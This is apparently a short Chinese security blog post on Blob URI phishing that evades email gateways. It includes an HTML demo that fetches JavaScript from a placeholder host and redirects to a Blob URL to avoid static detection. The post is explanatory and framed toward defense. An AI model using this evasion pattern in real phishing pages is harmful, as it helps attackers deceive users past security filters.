从Demo到防御：揭秘Blob URI钓鱼攻击的原理与实战防御

通过上一篇文章Cofense披露新型钓鱼攻击手法：利用 Blob URI 绕过 SEG，大概知道Blob URL的钓鱼攻击手法了。

下面再看个Demo，深入了解下攻击原理。

一、攻击实施路径

1. 诱导阶段

伪造可信邮件：

攻击者构造包含合法域名链接的钓鱼邮件（如baidu.com），利用百度品牌可信度降低用户警惕性。

绕过邮件网关：

链接指向的中间页面托管在合法的服务上，HTML文件无恶意特征，可顺利通过传统安全扫描。

2. 中间页面加载

举个简单的HTML页面看看。

中间页面加载的HTML文件，包含经过Base64编码的恶意脚本，关键代码如下：

<!DOCTYPE html>
<html>
  <body>
    <script>
      // 隐藏的恶意脚本加载逻辑
 fetch('https://test.com/test.js').then(response=> response.text()).then(code => {
        const blob = new Blob([code], {type: 'text/javascript'});
        const blobUrl = URL.createObjectURL(blob);
        window.location.href = blobUrl; // 关键一步，触发Blob URI跳转
      });
    </script>
  </body>
</html>

该脚本通过动态加载外部JS文件，避免静态特征被检测。

详情：从Demo到防御：揭秘Blob URI钓鱼攻击的原理与实战防御